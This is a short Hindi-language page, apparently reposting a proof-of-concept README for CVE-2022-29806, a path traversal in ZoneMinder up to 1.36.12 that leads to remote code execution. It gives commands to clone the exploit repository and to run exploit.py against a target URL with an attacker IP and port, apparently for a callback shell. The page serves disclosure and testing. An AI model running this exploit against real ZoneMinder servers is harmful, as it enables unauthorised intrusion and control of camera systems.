
ZoneMinder 1.36.12 तक भाषा विशेषाधिकार वृद्धि (और RCE) - Poc शोषण
ZoneMinder 1.36.12 तक भाषा विशेषाधिकार वृद्धि (और RCE)

ZoneMinder के 1.36.13 और 1.37.11 से पहले के संस्करण में डीबग लॉग फ़ाइल और डिफ़ॉल्ट भाषा विकल्प में एक पथ ट्रैवर्सल कमजोरी हमलावरों को रिमोट कमांड निष्पादन प्राप्त करने के लिए मनमाना कोड लिखने और निष्पादित करने की अनुमति देती है।
"प्रूफ ऑफ कॉन्सेप्ट का परीक्षण ZoneMinder 1.36.4 ubuntu18.04 डॉकर: ZoneMinder/zmdockerfiles के विरुद्ध किया गया था, लेकिन यह अभी भी नवीनतम संस्करण 1.36.12 तक लागू होगा।"
git clone https://github.com/OP3R4T0R/CVE-2022-29806
cd CVE-2022-29806
python3 exploit.py
python3 exploit.py -t <target_url> -ip <attacker_ip> -p <port>
python3 exploit.py -t <target_url> -ip <attacker-ip> -p <port>
pip3 install beautifulsoup4
pip3 install argparse
pip3 install requests
krastanoel ने कमजोरी की खोज की।